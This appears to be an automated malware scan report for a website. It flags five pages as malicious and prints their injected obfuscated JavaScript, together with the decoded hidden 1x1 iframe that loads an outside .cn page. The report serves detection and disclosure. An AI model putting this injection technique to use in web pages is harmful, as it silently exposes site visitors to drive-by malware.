Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=estelleblum.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status
http://estelleblum.com/ | 200 OK Content-Length: 3930 Content-Type: text/html | clean |
http://estelleblum.com/page%206.htm | 200 OK Content-Length: 6791 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca
Decoded script:
<iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe>
Antivirus reports:
http://estelleblum.com/bahamas.htm | 200 OK Content-Length: 4459 Content-Type: text/html | clean |
http://estelleblum.com/test404page.js | 404 Not Found Content-Length: 396 Content-Type: text/html | clean |
http://estelleblum.com/page%2016.htm | 200 OK Content-Length: 6934 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca
Decoded script:
<iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe>
Antivirus reports:
http://estelleblum.com/Page%201.htm | 200 OK Content-Length: 7048 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca
Decoded script:
<iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe>
Antivirus reports:
http://estelleblum.com/page%209.htm | 200 OK Content-Length: 6829 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca
Decoded script:
<iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe>
Antivirus reports:
http://estelleblum.com/page%203.htm | 200 OK Content-Length: 6815 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca
Decoded script:
<iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe>
Antivirus reports:
http://estelleblum.com/nagrody/green.htm | 200 OK Content-Length: 4740 Content-Type: text/html | clean |
http://estelleblum.com/nagrody/rates.htm | 200 OK Content-Length: 4784 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: estelleblum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:41:07 GMT
Accept-Ranges: bytes
ETag: "298e400-f5a-4c9c2ec1cee40"
Server: Apache
Content-Length: 3930
Content-Type: text/html
Last-Modified: Sat, 15 Sep 2012 19:55:29 GMT
...3930 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: estelleblum.com
Referer: http://www.google.com/search?q=estelleblum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.